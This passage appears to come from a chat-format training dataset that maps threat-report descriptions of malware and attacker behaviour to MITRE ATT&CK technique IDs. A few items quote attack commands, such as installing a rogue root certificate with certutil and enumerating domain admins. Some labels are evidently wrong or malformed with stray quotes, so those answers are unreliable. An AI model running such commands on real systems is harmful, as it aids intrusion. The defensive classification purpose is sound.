MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "uses public sites such as github.com and sendspace.com to upload files and then download them to victim computers." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Cachedump can extract cached password hashes from cache entry information." }, { "role": "assistant", "content": "T1003.005 - OS Credential Dumping: Cached Domain Credentials" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Mivast has the capability to gather NTLM password information." }, { "role": "assistant", "content": "T1003.002 - OS Credential Dumping: Security Account Manager" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "EXOTIC LILY has gathered targeted individuals' e-mail addresses through open source research and website contact forms." }, { "role": "assistant", "content": "T1589.002 - Email Addresses" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has used RDP connections to move across the victim network." }, { "role": "assistant", "content": "T1021.001 - Remote Services: Remote Desktop Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Cyclops Blink has the ability to use the Linux API function `utime` to change the timestamps of modified firmware update images." }, { "role": "assistant", "content": "T1070.006 - Indicator Removal on Host: Timestomp" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Rising Sun used dynamic API resolutions to various Windows APIs by leveraging `LoadLibrary()` and `GetProcAddress()`." }, { "role": "assistant", "content": "T1106 - Native API" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "RTM has the ability to remove Registry entries that it created during execution." }, { "role": "assistant", "content": "T1070 - Indicator Removal on Host" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can download files from its C2 server to the victim's machine." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Internal Reconnaissance APT40 uses compromised credentials to log on to other connected systems and conduct reconnaissance" }, { "role": "assistant", "content": "T1021 - Remote Services" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The script modifies Windows Defender settings to exclude the target logical drive it is going to wipe from scheduled and real-time scanning" }, { "role": "assistant", "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Leviathan has used BITSAdmin to download additional tools." }, { "role": "assistant", "content": "T1197 - BITS Jobs" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The macro prepends the string -----BEGIN CERTIFICATE----- to the beginning of the base64 encoded payload and appends -----END CERTIFICATE----- to the end of the data. The macro then writes this data to a text file in the C:\\Programdata folder using a random filename with the .txt extension. The macro then uses the command certutil -decode to decode the contents of this text file and outputs the decoded content to a randomly named file with a .exe extension in the C:\\Programdata folder. The macro sleeps for two seconds and then executes the newly dropped executable. Open-source Delivery Document Generator It appears that Sofacy may have used an open-source tool called Luckystrike to generate the delivery document and/or the macro used in this attack. Luckystrike, which was presented at DerbyCon 6 in September 2016, is a Microsoft PowerShell-based tool that generates malicious delivery documents by allowing a user to add a macro to an Excel or Word document to execute an embedded payload. We believe Sofacy used this tool, as the macro within their delivery document closely resembles the macros found within Luckystrike. To confirm our suspicions, we generated a malicious Excel file with Luckystrike and compared its macro to the macro found within Sofacy's delivery document. We found that there was only one difference between the macros besides the random function name and random cell values that the Luckystrike tool generates for each created payload" }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Examining the use of the unique user agents’ strings over time shows that while previously only the Mozilla/5.0 user agent was in use, since mid 2017 all three user agent strings have been used by the Zebrocy tool for its C2 communications" }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery', 'T1543.001 - Create or Modify System Process: Launch Agent" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Anchor has used ICMP in C2 communications." }, { "role": "assistant", "content": "T1095 - Non-Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BlackTech has used spearphishing e-mails with links to cloud services to deliver malware." }, { "role": "assistant", "content": "T1566.002 - Phishing: Spearphishing Link" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "malware gathers passwords from multiple sources, including Windows Credential Vault, Internet Explorer, Firefox, Chrome, and Outlook." }, { "role": "assistant", "content": "T1003 - OS Credential Dumping" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Leviathan has targeted RDP credentials and used it to move through the victim environment." }, { "role": "assistant", "content": "T1021.001 - Remote Services: Remote Desktop Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has encrypted C2 traffic with RC4, previously using keys of 88888888 and babybear." }, { "role": "assistant", "content": "T1573 - Encrypted Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "DarkVishnya used network sniffing to obtain login data." }, { "role": "assistant", "content": "T1040 - Network Sniffing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Vulnerabilities such as ProxyShell (CVE-2021-34473) and improper SQL sanitization (CVE-2021-20028) have been observed being utilized as footholds into the environment." }, { "role": "assistant", "content": "T1588.006 - Vulnerabilities', 'T1190 - Exploit Public-Facing Application" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The following code example shows the false flag being set (5 > 115) and the ETransaksi.diomadnfagaghagh method being called:  int num = 5; int num2 = 155; bool flag = num > num2; if (flag) { } else { NewLateBinding.LateCall(ETransaksi.diomadnfagaghagh(), null, \"Invoke\", new object[] { null, new object[0] }, null, null, null, true);The payload uses this technique to run a chain of methods that eventually carry out its malicious task" }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ajax Security Team has used FireMalv custom-developed malware, which collected passwords from the Firefox browser storage." }, { "role": "assistant", "content": "T1555.003 - Credentials from Password Stores: Credentials from Web Browsers" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ember Bear has added extra spaces between JavaScript code characters to increase the overall file size." }, { "role": "assistant", "content": "T1027.001 - Obfuscated Files or Information: Binary Padding" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Delivery TG-3390 conducts SWCs or sends spearphishing emails with ZIP archive attachments" }, { "role": "assistant", "content": "T1598.002 - Spearphishing Attachment" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Cardinal RAT decodes many of its artifacts and is decrypted (AES-128) after being downloaded." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "MarkiRAT can search for different processes on a system." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SysUpdate has the ability to download files to a compromised host." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "MacMa can collect information about a compromised computer, including: Hardware UUID, Mac serial number, macOS version, and disk sizes." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The Ritsol backdoor trojan used by can download files onto a compromised host from a remote location." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "contains a collection of Privesc-PowerUp modules that can query Registry keys for potential opportunities." }, { "role": "assistant", "content": "T1012 - Query Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "compromised user credentials and used valid accounts for operations." }, { "role": "assistant", "content": "T1078 - Valid Accounts" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has checked for the local admin group domain admin group and Exchange Trusted Subsystem groups using the commands net group Exchange Trusted Subsystem /domain and net group domain admins /domain." }, { "role": "assistant", "content": "T1069 - Permission Groups Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Mimikatz performs credential dumping to obtain account and password information useful in gaining access to additional systems and enterprise network resources. It contains functionality to acquire information about credentials in many ways, including from DCSync/NetSync." }, { "role": "assistant", "content": "T1003.006 - OS Credential Dumping: DCSync" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT28 registered domains imitating NATO, OSCE security websites, Caucasus information resources, and other organizations." }, { "role": "assistant", "content": "T1583.001 - Domains" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "XTunnel is capable of downloading additional files." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "monitors USB devices and copies files with certain extensions to\na predefined directory." }, { "role": "assistant", "content": "T1119 - Automated Collection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "A build tool is likely being used by these attackers that allows the operator to configure details such as C2 addresses, C2 encryption keys, and a campaign code" }, { "role": "assistant", "content": "T1573 - Encrypted Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "DarkComet can disable Security Center functions like anti-virus." }, { "role": "assistant", "content": "T1562.001 - Impair Defenses: Disable or Modify Tools" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PcShare has used an invalid certificate in attempt to appear legitimate." }, { "role": "assistant", "content": "T1036.001 - Invalid Code Signature" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Avenger has the ability to browse files in directories such as Program Files and the Desktop." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SLOWDRIFT downloads additional payloads." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "is known to utilize encryption within network protocols." }, { "role": "assistant", "content": "T1573 - Encrypted Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Turian can insert pseudo-random characters into its network encryption setup." }, { "role": "assistant", "content": "T1001.001 - Junk Data" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Elderwood has packed malware payloads before delivery to victims." }, { "role": "assistant", "content": "T1027.002 - Obfuscated Files or Information: Software Packing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Flagpro has the ability to wait for a specified time interval between communicating with and executing commands from C2." }, { "role": "assistant", "content": "T1029 - Scheduled Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Cobalt Group has used the Plink utility to create SSH tunnels." }, { "role": "assistant", "content": "T1572 - Protocol Tunneling', 'T1573.002 - Asymmetric Cryptography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Pasam creates a backdoor through which remote attackers can retrieve lists of running processes." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "gathers and beacons the operating system build number and CPU Architecture (32-bit/64-bit) during installation." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "P8RAT can send randomly-generated data as part of its C2 communication." }, { "role": "assistant", "content": "T1001.001 - Junk Data" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SUNSPOT appends an entry in the log file with the date and time of the backdoor attempt and waits for the MsBuild.exe process to exit before restoring the original source code and deleting the temporary InventoryManager.bk file. If the Orion solution build is successful, it is backdoored with SUNBURST" }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FunnyDream has used a service named `WSearch` for execution." }, { "role": "assistant", "content": "T1036.004 - Masquerading: Masquerade Task or Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Wizard Spider has obtained and used publicly-available post-exploitation frameworks and tools like Metasploit, Empire, Mimikatz." }, { "role": "assistant", "content": "T1588.002 - Tool" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BADFLICK has download files from its C2 server." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "A malware variant named Mal/Miner-C (also known as PhotoMiner) is infecting Internet-exposed Seagate Central Network Attached Storage (NAS) devices and using them to infect connected computers to mine for the Monero cryptocurrency" }, { "role": "assistant", "content": "T1080 - Taint Shared Content" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Grandoreiro also employs a technique for privilege escalation described in more detail here. The method relies on registering a binary as the default handler for .MSC files and then running such a file" }, { "role": "assistant", "content": "T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "They renamed their files to make them look like legitimate files, for example, KB77846376.exe, named after Microsoft update files. They routinely used standard tools that would mimic legitimate administrator activities. When planting webshells on the Outlook Exchange servers, they modified already existing legitimate flogon.js and logoff.aspx files. They relied on encrypted SSH-based tunnels to transfer tools and for remote command/program execution. They used multiple staging folders and opted to use directories that were used infrequently by legitimate users or processes. They routinely deleted dropped attack tools, execution logs, files staged for exfiltration, and other files after they were finished with them. They renamed their tools' filenames in the staging folder so that it would not be possible to identify the malware's purpose, even after it was deleted from the disk through the residual artifacts (e.g. ShimCache entries or WMI Recently Used Apps). - They used timestomping to modify the $STANDARD_INFORMATION attribute of the attack tools" }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "DCRat will also drop a .bat file containing a script that runs the W32tm “stripchart” command on the compromised host. This command is used as a delay tactic for its execution and beaconing." }, { "role": "assistant", "content": "T1124 - System Time Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The initial routine decrypts selected parts of the code section using XOR with a hardcoded value" }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Cyclops Blink has the ability to download files to target systems." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can enumerate drives and their types. It can also change file permissions using cacls.exe." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Pupy can execute Lazagne as well as Mimikatz using PowerShell." }, { "role": "assistant", "content": "T1003.001 - OS Credential Dumping: LSASS Memory" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PyDCrypt has attempted to execute with WMIC." }, { "role": "assistant", "content": "T1047 - Windows Management Instrumentation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FireEye Research Labs, the intelligence behind our Mandiant Consultancy services, identified a new Internet Explorer (IE) zero-day exploit used in targeted attacks. The vulnerability affects IE6 through IE11, but the attack is targeting IE9 through IE11. Microsoft has assigned CVE-2014-1776 to the vulnerability and released security advisory to track this issue" }, { "role": "assistant", "content": "T1203 - Exploitation for Client Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Gold Dragon enumerates registry keys with the command \"regkeyenum\" and obtains information for the Registry key \"HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\"." }, { "role": "assistant", "content": "T1012 - Query Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "This watchdog process also ensures that the Cardinal RAT process is always running, as well as ensures that the executable is located in the correct path. Should either of these conditions not be met, the watchdog process will spawn a new instance of Cardinal RAT, or write Cardinal RAT to the correct location, respectively" }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ke3chang has used implants capable of collecting the signed-in username." }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "OopsIE uses HTTP for C2 communications." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "This decrypted data is written to the following location: %TEMP%\\WUpdate.~tmp This ‘WUpdate.~tmp’ file is then copied to a filename of ‘Applet.cpl’, which is placed in the previously identified file path" }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information', 'T1074 - Data Staged" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In order to meet the phishing emails’ infrastructure requirements, disposable domains and emails were used as the delivery medium. On occasions, the phishing emails contained links to external domains to download the first stage, and sometimes the first stage was attached to the email itself" }, { "role": "assistant", "content": "T1566.002 - Phishing: Spearphishing Link" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Shamoon creates a new service named “ntssrv” that attempts to appear legitimate; the service's display name is “Microsoft Network Realtime Inspection Service” and its description is “Helps guard against time change attempts targeting known and newly discovered vulnerabilities in network time protocols.” Newer versions create the \"MaintenaceSrv\" service, which misspells the word \"maintenance.\"" }, { "role": "assistant", "content": "T1036.004 - Masquerading: Masquerade Task or Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BADNEWS has a command to download an .exe and execute it via CreateProcess API. It can also run with ShellExecute." }, { "role": "assistant", "content": "T1106 - Native API" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "MoonWind completes network communication via raw sockets." }, { "role": "assistant", "content": "T1095 - Non-Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "POWERSTATS can use VBScript (VBE) code for execution." }, { "role": "assistant", "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Chinese state-sponsored cyber actors have been observed using a non-standard SSH port to establish covert communication channels with VPS infrastructure." }, { "role": "assistant", "content": "T1571 - Non-Standard Port" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "UNC2452 used WMI for the remote execution of files for lateral movement." }, { "role": "assistant", "content": "T1047 - Windows Management Instrumentation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ShadowPad has sent data back to C2 every 8 hours." }, { "role": "assistant", "content": "T1029 - Scheduled Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The first layer of the FYAnti loader decrypts an embedded .NET module and executes it using the CppHostCLR technique. The .NET module is packed using “ConfuserEx v1.0.0” and acts as yet another loader that searches for a file in the “C:\\Windows\\Microsoft.NET\\” directory with file sizes between 100,000 and 500,000" }, { "role": "assistant", "content": "T1027.002 - Obfuscated Files or Information: Software Packing', 'T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Darkhotel has used malware that searched for files with specific patterns." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The link “Check” led to a Google Docs page, which contained a link that redirected to a ZIP file. The ZIP file was hosted on a likely compromised SharePoint account and contained Domenus VBS, which downloads Harpy from https[:]//fashionableeder[.]com/info. At one victim, CARBON SPIDER subsequently deployed the aforementioned custom PS Sekur stager and profiled the Active Directory environment using the utility ADFind" }, { "role": "assistant", "content": "T1204.001 - Malicious Link" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Unknown Logger can obtain information about the victim's IP address." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has delivered malicious links and macro-enabled documents that required targets to click the \"enable content\" button to execute the payload on the system." }, { "role": "assistant", "content": "T1204 - User Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Exaramel for Linux has a command to download a file from and to a remote C2 server." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can be used to install browser root certificates as a precursor to performing man-in-the-middle between connections to banking websites. Example command: certutil -addstore -f -user ROOT ProgramData\\cert512121.der." }, { "role": "assistant", "content": "T1553.004 - Subvert Trust Controls: Install Root Certificate" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the 